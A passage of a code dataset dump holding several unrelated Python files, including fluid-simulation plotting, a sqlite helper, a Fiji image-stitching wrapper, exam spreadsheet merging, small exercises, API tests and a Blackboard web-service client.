n_weights)\nweights = np.vstack((temp, 1-temp)).transpose()\n\nstep = 1\norder = 2\nvort_thr = .3\n\n# %% Read Simulation Data\nx_full, y_full, u_full, v_full,\\\n vort_full, u_std, v_std, Cont, Mom = PC.Read_Data(AoA, step=step)\n\nx, y, u, v, vort = PC.make_square(x_full, y_full, u_full, v_full, vort_full,\n 1000, step=step)\n\nMom_OT = np.zeros((n_weights, ))\nMom_lin = np.zeros_like(Mom_OT)\nvort_OT_norm = np.zeros_like(Mom_OT)\nvort_lin_norm = np.zeros_like(Mom_OT)\n\ndx = np.gradient(x[0, :])\ndy = np.gradient(y[:, 0])\nMom_sq = PC.Momentum(vort[1], u[1], v[1], dx, dy)\n\n# %% Read OT Results\nfor i, w in enumerate(weights):\n x_OT = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_x.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n y_OT = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_y.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n vort_OT_pos = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_pos.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n vort_OT_neg = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_neg.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n sums = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_sums.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n vort_OT = vort_OT_pos*np.sum(w*sums[0])\\\n - vort_OT_neg*np.sum(w*sums[1])\n \n vort_OT_norm[i] = np.linalg.norm(abs(vort_OT-vort[1]), ord=order)\n \n # %% Calcualte Velocities\n mask_vort = abs(vort_OT) > vort_thr*np.max(abs(vort_OT))\n u_OT_vort, v_OT_vort = PC.u_omega(x, y, x[mask_vort], y[mask_vort],\n vort_OT[mask_vort], h=step)\n \n print('Creating & Solving Vortex Line')\n start_VL = time.time()\n x_arc, y_arc = PC.Gen_Arc_full_res(AoA[1])\n \n Arc = VL.VortexLine(x_arc, y_arc)\n \n exvelo_OT = lambda xl, yl: exvelo_base(xl, yl, u_OT_vort+1, v_OT_vort)\n \n gamma_OT = Arc.solve_gamma(exvelo_OT)\n \n u_OT_vl, v_OT_vl = Arc.velocity(gamma_OT, x, y)\n \n \n u_OT_tot = u_OT_vort - u_OT_vl + 1\n v_OT_tot = v_OT_vort - v_OT_vl\n \n Mom_OT[i] = np.linalg.norm(PC.Momentum(vort_OT, u_OT_tot, v_OT_tot,\n dx, dy), ord=order)\n \n # %% Calculate Linear Interpolation\n \n vort_lin = (vort[0]*w[0] + vort[2]*w[1])\n vort_lin_norm[i] = np.linalg.norm(abs(vort_lin-vort[1]), ord=order)\n\n # %% Calculate Velocities\n \n mask_vort = abs(vort_lin) > vort_thr*np.max(abs(vort_lin))\n u_lin_vort, v_lin_vort = PC.u_omega(x, y, x[mask_vort], y[mask_vort],\n vort_lin[mask_vort], h=step)\n \n exvelo_lin = lambda xl, yl: exvelo_base(xl, yl, u_lin_vort+1, v_lin_vort)\n gamma_lin = Arc.solve_gamma(exvelo_lin)\n u_lin_vl, v_lin_vl = Arc.velocity(gamma_lin, x, y)\n \n u_lin_tot = u_lin_vort - u_lin_vl + 1\n v_lin_tot = v_lin_vort - v_lin_vl\n \n Mom_lin[i] = np.linalg.norm(PC.Momentum(vort_lin, u_lin_tot, v_lin_tot,\n dx, dy), ord=order)\n# %% PLOTS\n# %% Vorticity & Momentum\nf, ax = plt.subplots(2, 1, sharex=True)\n# f.suptitle(\"{:.0f}° - {:.0f}° - {:.0f}°, Momentum and Vorticity Error\".format(AoA[0], AoA[1], AoA[2]))\n\nax[0].plot(weights[:][:, 0], Mom_OT/np.linalg.norm(Mom_sq, ord=order),\n 'b', label='OT')\nax[0].plot(weights[:][:, 0], Mom_lin/np.linalg.norm(Mom_sq, ord=order),\n 'r', label='Linear')\nax[0].scatter(weights[Mom_OT.argmin(), 0],\n np.min(Mom_OT)/np.linalg.norm(Mom_sq, ord=order),\n marker='x', color='b')\nax[0].scatter(weights[Mom_lin.argmin(), 0],\n np.min(Mom_lin)/np.linalg.norm(Mom_sq, ord=order),\n marker='x', color='r')\nax[0].legend()\n\nax[1].plot(weights[:][:, 0], vort_OT_norm/np.linalg.norm(vort[1], ord=order),\n 'b', label='Vorticity OT')\nax[1].plot(weights[:][:, 0], vort_lin_norm/np.linalg.norm(vort[1], ord=order),\n 'r', label='Vorticity Linear')\nax[1].scatter(weights[vort_OT_norm.argmin(), 0],\n np.min(vort_OT_norm)/np.linalg.norm(vort[1], ord=order),\n marker='x', color='b')\nax[1].scatter(weights[vort_lin_norm.argmin(), 0],\n np.min(vort_lin_norm)/np.linalg.norm(vort[1], ord=order),\n marker='x', color='r')\n\nax[1].set_xlabel(\"Weight {:.0f}° Sim\".format(AoA[0]))\nax[1].set_ylabel(\"Vorticity Error\")\nax[0].set_ylabel(\"Momentum Error\")\n\n\n# %% Momentum\nf, ax = plt.subplots(1, 1, sharex=True)\n# f.suptitle(\"{:.0f}° - {:.0f}° - {:.0f}°, Momentum and Vorticity Error\".format(AoA[0], AoA[1], AoA[2]))\n\nax.plot(weights[:][:, 0], Mom_OT/np.linalg.norm(Mom_sq, ord=order),\n 'b', label='OT')\nax.plot(weights[:][:, 0], Mom_lin/np.linalg.norm(Mom_sq, ord=order),\n 'r', label='Linear')\nax.scatter(weights[Mom_OT.argmin(), 0],\n np.min(Mom_OT)/np.linalg.norm(Mom_sq, ord=order),\n marker='x', color='b')\nax.scatter(weights[Mom_lin.argmin(), 0],\n np.min(Mom_lin)/np.linalg.norm(Mom_sq, ord=order),\n marker='x', color='r')\nax.legend()\n\nax.set_xlabel(\"Weight {:.0f}° Sim\".format(AoA[0]))\nax.set_ylabel(\"Momentum Error\")\n\n","sub_path":"Code/Plot_Thesis_Results_Weights.py","file_name":"Plot_Thesis_Results_Weights.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"324713683","text":"'''\n UNUSED MODULE, REPLACED BY MODELS\n'''\n\nimport uuid\nimport sqlite3\n\nDATABASE = \"db.sqlite3\"\nCOLUMNS = {\"Users\" : [\"id\", \"forms\"],\n \"Forms\" : [\"id\", \"ownerID\", \"questions\", \"correctAnswers\", \"userAnswers\"],\n \"Questions\" : [\"id\", \"questionType\", \"question\", \"choices\", \"order\"],\n \"Answers\" : [\"id\", \"questionType\", \"answer\"]}\n\ndef generateUUID():\n return str(uuid.uuid4().int)[1:]\n\n\ndef query(table, tag, identity=None):\n q = []\n if(table.title() not in COLUMNS.keys() or tag not in COLUMNS[table.title()]):\n raise ValueError\n conn = sqlite3.connect(DATABASE)\n cur = conn.cursor()\n if(identity):\n cur.execute(\"SELECT \"+tag+\" FROM \"+table.title()+\" WHERE id = '\"+identity+\"'\")\n else:\n cur.execute(\"SELECT \"+tag+\" FROM \"+table.title())\n for fetch in cur.fetchall():\n q.append(fetch[0])\n conn.close()\n return q\n\ndef commit(table, cols):\n if(table.title() not in COLUMNS.keys() or len(cols) != len(COLUMNS[table.title()])):\n raise ValueError\n conn = sqlite3.connect(DATABASE)\n cur = conn.cursor()\n s = \"INSERT INTO \"+table.title()+\"(\"\n for col in COLUMNS[table.title()]:\n s += col+\",\"\n s += \") VALUES(\"\n for var in cols:\n s+= str(var)+\",\"\n s += \");\"\n cur.execute(s)\n conn.commit()\n conn.close()","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"371181948","text":"#!/usr/bin/env python3\nfrom __future__ import print_function, division\nimport os\nimport glob\nimport tifffile\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nimport shutil\nimport sys\nimport cv2\n#import magic\nimport re\nfrom PIL import Image, ImageOps\nfrom ast import literal_eval as make_tuple\nfrom tqdm import tqdm\nfrom pprint import pprint\nclass Fiji_Stitcher(object):\n def __init__(self, input_dir, output_dir, cmin, cmax, overlap):\n self.input_dir = input_dir\n self.output_dir = output_dir\n self.cmin = cmin\n self.cmax = cmax\n self.overlap = overlap\n self.ijm_file = None\n self.flist = None\n self.cc_flist = None\n self.MIN_ROW = 0\n self.MIN_COL = 0\n self.MAX_ROW = 0\n self.MAX_COL = 0\n self.TILE_ROW = 0\n self.TILE_COL = 0\n\n def convert_to_8bit(self):\n #self.convert_ijm_file = os.path.join(self.output_dir, 'convert_test.ijm')\n #self.outdir = \n ims = []\n cc_path = os.path.join(self.output_dir, 'cc')\n if not self.cc_flist:\n self.cc_flist = []\n if not os.path.exists(cc_path):\n os.makedirs(cc_path)\n\n for f_in in self.flist:\n fname = os.path.split(f_in)[-1]\n f_out = os.path.join(cc_path, fname)\n self.cc_flist.append(f_out)\n #print(out_f)\n im = cv2.imread(f_in,cv2.IMREAD_UNCHANGED)\n _im = np.clip(im,self.cmin, self.cmax)\n _im = np.uint8((_im-self.cmin) / (self.cmax-self.cmin) * 255)\n tifffile.imsave(f_out,_im)\n self.cc_flist = sorted(self.cc_flist)\n\n def prepare_macro(self):\n self.ijm_file = os.path.join(self.output_dir, 'test.ijm')\n commands = []\n with open(self.ijm_file,'w') as f:\n ##for fname in self.flist:\n #print(fname)\n #matches = re.match(r\"(?P^.+)/(?P[^/]+)_y(?P[0-9]+)_x(?P[0-9]+).(?Ptif*)$\", fname)\n #print(matches.groupdict())\n ##tiles = glob.glob('Tile*.tif')\n #exp_name = matches['exp_name']\n #f_type = matches['f_type']\n \n #row = int(matches['y'])\n #col = int(matches['x'])\n if self.cc_flist:\n FLIST = self.cc_flist\n else:\n FLIST = self.flist\n for fname in FLIST:\n matches = re.match(r\"(?P^.+)/(?P[^/]+)_y(?P[0-9]+)_x(?P[0-9]+).(?Ptif*)$\", fname)\n print(matches.groupdict())\n row = int(matches['y'])\n col = int(matches['x'])\n dirname = matches['dirname']\n exp_name = matches['exp_name']\n f_type = matches['f_type']\n self.MIN_ROW = min(self.MIN_ROW, row)\n self.MIN_COL = min(self.MIN_COL, col)\n self.MAX_ROW = max(self.MAX_ROW, row)\n self.MAX_COL = max(self.MAX_COL, col)\n print(self.MAX_ROW, self.MAX_COL)\n #self.MAX_ROW = max(row)\n #self.MAX_COL = max(col)\n #longer_col = self.MAX_ROW < self.MAX_COL\n #min_ind = np.argmin(col if longer_col else row)\n #max_ind = np.argmax(col if longer_col else row)\n #continue\n #tilename = tiles[0][0:6]+'{y}'+tiles[0][7:9]+'{x}'+tiles[0][10:]\n tilename = exp_name+'_y{y}_x{x}'+'.'+f_type\n print(tilename)\n #command = 'run(\"Grid/Collection stitching\", \"type=[Filename defined position] order=[Defined by filename ] grid_size_x='+str(self.MAX_COL)+' grid_size_y='+str(self.MAX_ROW)+ \\\n #' tile_overlap=8 first_file_index_y='+str(self.MIN_COL)+' first_file_index_x='+str(self.MIN_ROW)+' directory='+dirname+ \\\n #' file_names='+tilename+' output_textfile_name=TileConfiguration.txt fusion_method=[Average] regression_threshold=0.30 max/avg_displacement_threshold=2.50 absolute_displacement_threshold=3.50 compute_overlap computation_parameters=[Save computation time (but use more RAM)] image_output=[Write to disk] output_directory='+self.output_dir+'\");\\n'\n # more pythonic\n\n command = 'run(\"Grid/Collection stitching\", \"type=[Filename defined position] order=[Defined by filename ] grid_size_x={0:d} grid_size_y={1:d} \\\n tile_overlap={2:d} first_file_index_y={3:d} first_file_index_x={4:d} directory={5:s} \\\n file_names={6:s} output_textfile_name=TileConfiguration.txt fusion_method=[{7:s}] regression_threshold={8:.2f} max/avg_displacement_threshold={9:.2f} \\\n absolute_displacement_threshold={10:.2f} compute_overlap {11:s} computation_parameters=[Save computation time (but use more RAM)] image_output=[Write to disk] output_directory={12:s}\");\\n'.format(\\\n self.MAX_COL,\\\n self.MAX_ROW,\\\n self.overlap,\\\n self.MIN_COL,\\\n self.MIN_ROW,\\\n dirname,\\\n tilename,\\\n 'Linear Blending',\\\n 0.30,\\\n 2.50,\\\n 3.50,\\\n 'subpixel_accuracy',\\\n self.output_dir)\n\n #make sure you have the correct tile_overlap value and correct x and y units for the grid size\n print(command)\n #print(command)\n f.write(command)\n #min_fname = os.path.join(dirname, tiles[min_ind])\n #max_fname = os.path.join(dirname, tiles[max_ind])\n #print(min_fname,max_fname)\n\n \n\n \n \n #except:\n #continue\n pass\n def run_fiji(self):\n print('fiji --headless -macro '+self.ijm_file)\n os.system('fiji --headless -macro '+self.ijm_file)\n pass\n \n\n\n\n \n\n \n \n \n def unify_size(self, x_cut=0, y_cut=0):\n get_index = lambda f: int(f.split('/')[-1].split('_')[1].split('.')[0])\n out_flist = glob.glob(os.path.join(self.output_dir, 'S_*.tif'))\n out_flist.sort(key=get_index)\n\n cut_out_dir = os.path.join(self.output_dir, 'cut')\n #print(out_flist)\n \n first_flag = True\n for o in out_flist[0:3]:\n old_data = cv2.imread(o,flags=cv2.IMREAD_GRAYSCALE)\n print(old_data.shape)\n if first_flag:\n new_x = (x_cut, old_data.shape[0]-x_cut)\n new_y = (y_cut, old_data.shape[0]-y_cut)\n print(new_x,new_y)\n first_flag = False\n cv2.imwrite(os.path.join(self.output_dir,output_fname), new_data)\n break\n\n def run(self):\n print(\"Input:\", self.input_dir)\n print(\"Output:\", self.output_dir)\n\n if not os.path.exists(self.output_dir):\n os.makedirs(self.output_dir)\n self.flist= glob.glob(os.path.join(self.input_dir,'*.tif*'))\n #get_index = lambda f: int(f.split('/')[-1].split('_')[1])\n #self.flist.sort(key=get_index)\n self.flist.sort()\n #pprint(self.flist)\n \n #matches = [re.match(r\"^(?P[a-zA-Z]+)(?P[0-9]+)($|[a-zA-Z_]+(?P[0-9]+))\", c).groupdict() for c in comments]\n # Step 1: Prepare stitch macro, fix large image\n self.convert_to_8bit()\n self.prepare_macro()\n \n # Step 2: Run stitch\n self.run_fiji()\n \n\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input')\n parser.add_argument('--output')\n parser.add_argument('--cmin', type=float)\n parser.add_argument('--cmax', type=float)\n parser.add_argument('--overlap', type=int)\n #parser.add_argument('--stitch', default=False, type=bool)\n args = parser.parse_args()\n #rootDir = os.getcwd()\n fs = Fiji_Stitcher(args.input, args.output, args.cmin, args.cmax, args.overlap)\n fs.run()\nif __name__ == '__main__':\n main()\n ","sub_path":"KLab_Utils/fiji_stitch.py","file_name":"fiji_stitch.py","file_ext":"py","file_size_in_byte":7976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"520052804","text":"from merge_exam_info.lib.func import get_filenames, get_students_exam_info_data, \\\r\n from_computer_course_info_get_students_data\r\nfrom openpyxl import load_workbook\r\n\r\npath = '计算机应用基础模板-.xlsx'\r\nsheet_name = '计算机应用基础模板'\r\n\r\njsj_datas = from_computer_course_info_get_students_data(path=path)\r\n\r\n# 中央开学生考试数据\r\n# path = '签到表/中央开网考/data/'\r\npath = 'xml/'\r\n# 获取指定文件夹下所有xml文件名列表\r\nfilenames = get_filenames(path)[1:]\r\nzyk_datas = get_students_exam_info_data(filenames, path)\r\n\r\nprint(f'计算机应用基础人数{len(jsj_datas)}')\r\nprint(f'网考人数{len(zyk_datas)}')\r\n\r\n# 数据合并\r\nfor data in jsj_datas:\r\n zyk_datas.append(data)\r\n\r\nprint(f'合并后总人数{len(zyk_datas)}')\r\n\r\nwb = load_workbook('tzd.xlsx')\r\n\r\n# 获取行数\r\nrows = wb['sheet1'].max_row\r\nfor a_i in range(1, rows + 1):\r\n print(f'-------程序进行到第{a_i}行-------')\r\n a_val = wb['sheet1'][f'A{a_i}'].value\r\n try:\r\n stu_id = a_val[24:37] # 学号\r\n # 如果学号存在,从数据中遍历学生信息\r\n for i in range(len(zyk_datas) - 1, -1, -1): # 倒叙遍历,为了可以删除找到的元素,缩短查找时间\r\n stu_info = zyk_datas[i]\r\n # 如果学号在信息表中找到\r\n if stu_id == stu_info[0]:\r\n # 遍历该学生所有考试科目,考试科目数量不会超过30\r\n for j in range(2, 30):\r\n # 获取通知单试卷号\r\n sjh = wb['sheet1'][f'A{a_i + j}'].value\r\n # 先判断sjh是否为'考点名称:秦皇岛电大',\r\n if sjh == '考点名称:秦皇岛电大':\r\n # print(sjh)\r\n break\r\n # 如果试卷号在列表中\r\n elif str(sjh) in stu_info:\r\n # 写入考场号\r\n wb['sheet1'][f'D{a_i + j}'].value = stu_info[1]\r\n # 写入座位号\r\n wb['sheet1'][f'E{a_i + j}'].value = stu_info[2]\r\n # 写入考试日期\r\n wb['sheet1'][f'F{a_i + j}'].value = stu_info[4]\r\n # 写入考试时间\r\n wb['sheet1'][f'G{a_i + j}'].value = stu_info[5]\r\n # print(stu_id)\r\n print(f'{stu_id}试卷号{sjh}写入完毕!')\r\n # 移除找到的元素,缩小查找范围\r\n zyk_datas.pop(i)\r\n # print(len(zyk_datas))\r\n except Exception as e:\r\n print(e)\r\n continue\r\nwb.save('tzd.xlsx')\r\nwb.close()\r\n","sub_path":"merge_exam_info/merge_exam_info_by_openpyxl.py","file_name":"merge_exam_info_by_openpyxl.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"515423317","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nclass FloatRange(object):\n def __init__(self, start, end, step=0.1):\n self.start = start\n self.end = end\n self.step = step\n# 正向迭代\n def __iter__(self):\n t = self.start\n while t <= self.end:\n yield t\n t += self.step\n# 反向迭代接口\n def __reversed__(self):\n t = self.end\n while t >= self.start:\n yield t\n t -= self.step\n\n# test\nif __name__ == '__main__':\n for x in FloatRange(1.0, 4.0, 0.5):\n print(x)\n print('反向迭代:')\n for x in reversed(FloatRange(1.0, 4.0, 0.5)):\n print(x)\n\n\n\n\n","sub_path":"01_Python_Basics/36-reversed-iterator.py","file_name":"36-reversed-iterator.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"549649110","text":"import argparse\nparser = argparse.ArgumentParser(description='select a integer, start from 1')\nparser.add_argument(\"ID\", help=\"Select file to process according to SGE_TASK_ID integer\",\n type=int)\nargs = parser.parse_args()\nprint(args.ID)\nimport os\nimport loompy\n\n#path=\"/home/yah2014/Dropbox/Public/Olivier/Projects/scRNAseq-Lymphoma/data\"\npath=\"/Users/yah2014/Dropbox/Public/Olivier/Projects/scRNAseq-Lymphoma/data\"\nos.chdir(path) # change current path\nprint(os.getcwd())\n# List all filer folder's names.\nfile_folders=os.listdir(os.getcwd()) # list files\nfile=file_folders[args.ID-1]\nprint(file)\n\n# Select the file according to SGE_TASK_ID\nfile_path=os.path.join(path, file, \"velocyto\",file+'.loom')\nprint(\"file_path= \"+file_path)\n\n\n","sub_path":"bash/velocyto_single.py","file_name":"velocyto_single.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"472978610","text":"A = [99,55,4,66,28,31,36,52,38,72]\n\ndef insertionSort(A):\n for i in range(1, len(A)):\n x = A[i]\n j = i -1 \n while j >= 0 and x < A[j]:\n A[j+1] = A[j]\n j -= 1\n A[j+1] = x\n \ninsertionSort(A)\nprint(A)","sub_path":"insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"639484384","text":"import pytest\nimport requests\nimport re\n\n\ndef test_random_image():\n r = requests.get('https://dog.ceo/api/breeds/image/random').json()\n assert re.search(r'.jpg', r['message']), 'no JPG'\n assert r['status'] == 'success', 'fail'\n\n\ndef test_list():\n r = requests.get('https://dog.ceo/api/breed/hound/images').json()\n assert r['message'] != [], 'empty message'\n assert r['status'] == 'success', 'fail'\n\n\ndef test_breed_list():\n r = requests.get('https://dog.ceo/api/breeds/list/all').json()\n assert r['message'] != [], 'empty message'\n assert r['status'] == 'success', 'fail'\n\n\n@pytest.mark.parametrize('breeds', ['akita', 'beagle', 'brabancon', 'malamute', 'husky'])\ndef test_breed(breeds):\n r = requests.get(f'https://dog.ceo/api/breed/{breeds}/images/random').json()\n assert f'{breeds}' in r['message'], 'the breed does not match'\n assert r['status'] == 'success', 'fail'\n\n\n@pytest.mark.parametrize('quantity', range(1, 51))\ndef test_sub_breed(quantity):\n r = requests.get(f'https://dog.ceo/api/breed/hound/afghan/images/random/{quantity}').json()\n assert len(r['message']) == int(f'{quantity}'), 'number of pictures matches'\n assert r['status'] == 'success', 'fail'\n","sub_path":"test_dog-api.py","file_name":"test_dog-api.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"540100221","text":"#!/usr/bin/env python\n#\n# Project: Video Streaming with Flask\n# Author: Log0 \n# Date: 2014/12/21\n# Website: http://www.chioka.in/\n# Description:\n# Modified to support streaming out with webcams, and not just raw JPEGs.\n# Most of the code credits to Miguel Grinberg, except that I made a small tweak. Thanks!\n# Credits: http://blog.miguelgrinberg.com/post/video-streaming-with-flask\n#\n# Usage:\n# 1. Install Python dependencies: cv2, flask. (wish that pip install works like a charm)\n# 2. Run \"python main.py\".\n# 3. Navigate the browser to the local webpage.\n\nfrom flask import Flask, render_template, Response\nimport rest\nimport json\nimport os\n\nif __name__ == '__main__':\n\n server_url = 'http://127.0.0.1:8081'\n kod = 'aaaa'\n\n stream_url = server_url+'/get_ip'\n podaci = {\"kod\":kod}\n p = json.dumps(podaci)\n provera = rest.send('POST', stream_url, p, {'Content-Type': 'application/json'})\n print(provera)\n if 'status' in provera and provera['status'] == 'ok':\n ip = provera['ip']\n print(ip)\n os.system(r'\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" %s' % ip)\n else:\n print('neuspesno')\n\n #app.run(host='0.0.0.0', debug=True)","sub_path":"racunar.py","file_name":"racunar.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"519080078","text":"#!/usr/bin/python\n\n'''\nProblem 5:\n2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n'''\n\ndef multipleOfAll20(i):\n for j in range(1,21):\n if i % j != 0:\n print(\"Not multiple of %s\" % j)\n return False\n return True\n\ndef primeFactors(i):\n factors = []\n j = 2\n while j <= i:\n while i % j == 0:\n i = i / j\n factors.append(j)\n j = j + 1\n return factors\n\ndef factorCount(factors):\n factorDict = {}\n for factor in factors:\n if not(factorDict.has_key(factor)):\n factorDict[factor] = 1\n else:\n factorDict[factor] = factorDict[factor] + 1\n return factorDict\n\ndef getMaxFactorsForEach(i):\n maxFactors = {}\n for i in range(1,i+1):\n currentCount = factorCount(primeFactors(i))\n for factor in currentCount:\n if not(maxFactors.has_key(factor)):\n maxFactors[factor] = currentCount[factor]\n elif maxFactors[factor] < currentCount[factor]:\n maxFactors[factor] = currentCount[factor]\n return maxFactors\n\nfactorDict = getMaxFactorsForEach(20)\n\nproduct = 1\nfor factor in factorDict:\n for i in range(factorDict[factor]):\n product = product * factor\n\nprint(product)\n\n# This was for sanity-checking that the algorithm worked\n# print multipleOfAll20(product)\n\n'''\nAnswer: 232792560\n'''\n","sub_path":"python/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"75020534","text":"import unittest\nfrom insights.parsers.uname import Uname\nfrom insights.parsers.redhat_release import RedhatRelease\nfrom insights.combiners.redhat_release import redhat_release\nfrom insights.tests import context_wrap\n\nUNAME = \"Linux localhost.localdomain 3.10.0-327.rt56.204.el7.x86_64 #1 SMP PREEMPT RT Thu Oct 29 21:54:23 EDT 2015 x86_64 x86_64 x86_64 GNU/Linux\"\nBAD_UNAME = \"Linux localhost.localdomain 2.6.24.7-101.el5rt.x86_64 #1 SMP PREEMPT RT Thu Oct 29 21:54:23 EDT 2015 x86_64 x86_64 x86_64 GNU/Linux\"\n\nREDHAT_RELEASE = \"\"\"\nRed Hat Enterprise Linux Server release 7.2 (Maipo)\n\"\"\".strip()\n\nFEDORA = \"\"\"\nFedora release 23 (Twenty Three)\n\"\"\".strip()\n\n\nclass TestRedhatRelease(unittest.TestCase):\n def test_uname(self):\n un = Uname(context_wrap(UNAME))\n shared = {Uname: un}\n expected = (7, 2)\n result = redhat_release(None, shared)\n self.assertEqual(result.major, expected[0])\n self.assertEqual(result.minor, expected[1])\n\n def test_redhat_release(self):\n rel = RedhatRelease(context_wrap(REDHAT_RELEASE))\n shared = {RedhatRelease: rel}\n expected = (7, 2)\n result = redhat_release(None, shared)\n self.assertEqual(result.major, expected[0])\n self.assertEqual(result.minor, expected[1])\n\n def test_both(self):\n un = Uname(context_wrap(UNAME))\n rel = RedhatRelease(context_wrap(REDHAT_RELEASE))\n shared = {Uname: un, RedhatRelease: rel}\n expected = (7, 2)\n result = redhat_release(None, shared)\n self.assertEqual(result.major, expected[0])\n self.assertEqual(result.minor, expected[1])\n\n def test_raise(self):\n un = Uname(context_wrap(BAD_UNAME))\n shared = {Uname: un}\n with self.assertRaises(Exception):\n redhat_release(None, shared)\n","sub_path":"insights/combiners/tests/test_redhat_release.py","file_name":"test_redhat_release.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"508695363","text":"\"\"\"\ncomentário...\nfiz um pip install simplekml e no pypi pra fazer rodar o import\n\"\"\"\nimport simplekml\nlongitude=input(\"Enter longitude: \")\nlatitude=input(\"Enter longitude: \")\nkml=simplekml.Kml()\nkml.newpoint(name=\"Sample\",coords=[(longitude,latitude)])\nkml.save(\"C:\\\\Cursos\\\\Python\\\\Python_udemy\\\\Python_for_begginers\\\\Points.kml\")","sub_path":"Python_udemy/Python_for_begginers/google_earth.py","file_name":"google_earth.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"106021545","text":"'''\r\nCreated on Oct 27, 2010\r\n\r\n@author: Chris Greenough - Chris.Greenough@nau.edu\r\n'''\r\n##from bbwsdl.User_WS_services import *\r\n##from bbwsdl.User_WS_services_types import *\r\nfrom bbwsdl import User_WS_services\r\nimport logging\r\nfrom BbPy.VO.UserWS import *\r\nclass UserWS(object):\r\n log=logging.getLogger(\"UserWS\")\r\n port=None\r\n sigHandler=None\r\n def __init__(self,sigHandler, baseUrl=None):\r\n self.sigHandler=sigHandler\r\n \r\n locator = User_WSLocator()\r\n self.port=locator.getUser_WSPortType(baseUrl)\r\n self.port.binding.sig_handler=self.sigHandler\r\n \r\n request = User_WS_services.getServerVersionRequest()\r\n response = self.port.getServerVersion(request)\r\n \r\n ret = response._return\r\n self.log.info(\"Connecting to UserWS version: %s\" % ret._version)\r\n \r\n def getUser(self,userFilterVO):\r\n request = getUserRequest()\r\n request._filter=userFilterVO.getUserFilter_Def()\r\n response = self.port.getUser(request)\r\n return map(UserVO,response._return)\r\n \r\n def getUserByBatchId(self,batchId):\r\n filter = UserFilterVO()\r\n filter.batchId=(batchId,)\r\n filter.filterType=UserFilterVO.GET_USER_BY_BATCH_ID_WITH_AVAILABILITY\r\n filter.available=True\r\n users = self.getUser(filter)\r\n if len(users) == 1: return users[0] \r\n else: return None\r\n \r\n def getUserByUserId(self,userId):\r\n filter = UserFilterVO()\r\n filter.name=(userId,)\r\n filter.filterType=UserFilterVO.GET_USER_BY_NAME_WITH_AVAILABILITY\r\n filter.available=True\r\n users = self.getUser(filter)\r\n if len(users) == 1: return users[0] \r\n else: return None\r\n \r\n def getUserById(self,id):\r\n filter = UserFilterVO()\r\n filter.id=(id,)\r\n filter.filterType=UserFilterVO.GET_USER_BY_ID_WITH_AVAILABILITY\r\n filter.available=True\r\n users = self.getUser(filter)\r\n if len(users) == 1: return users[0] \r\n else: return None\r\n \r\n def createSimpleUser(self, isAvailable, userName, studentId, email, firstName, lastName, *insRoles):\r\n \"\"\"\r\n @param isAvailable: boolean - Sets active\r\n @param userName: string - Sets userID\r\n @param studentId: string - Sets Student ID and batchUid\r\n @param email: string - Sets email\r\n @param firstName: string - Sets First Name\r\n @param lastName: string - Sets Last Name\r\n @param *instRoles: all the rest of the params will turn into institutional roles. First one being primary.\r\n \"\"\"\r\n user = UserVO()\r\n user.userBatchUid=studentId\r\n user.isAvailable=isAvailable\r\n user.name=userName\r\n user.studentId=studentId\r\n extendedInfo = ExtendedInfoVO()\r\n extendedInfo.emailAddress = email\r\n extendedInfo.familyName = firstName\r\n extendedInfo.givenName = lastName\r\n user.extendedInfo = extendedInfo\r\n user.insRoles = insRoles\r\n return self.saveUser(user)\r\n \r\n def updateSimpleUser(self,isAvailable, userName, studentId, email, firstName, lastName, *insRoles):\r\n \"\"\"\r\n @param isAvailable: boolean - Sets active\r\n @param userName: string - Sets userID\r\n @param studentId: string - Sets Student ID and batchUid\r\n @param email: string - 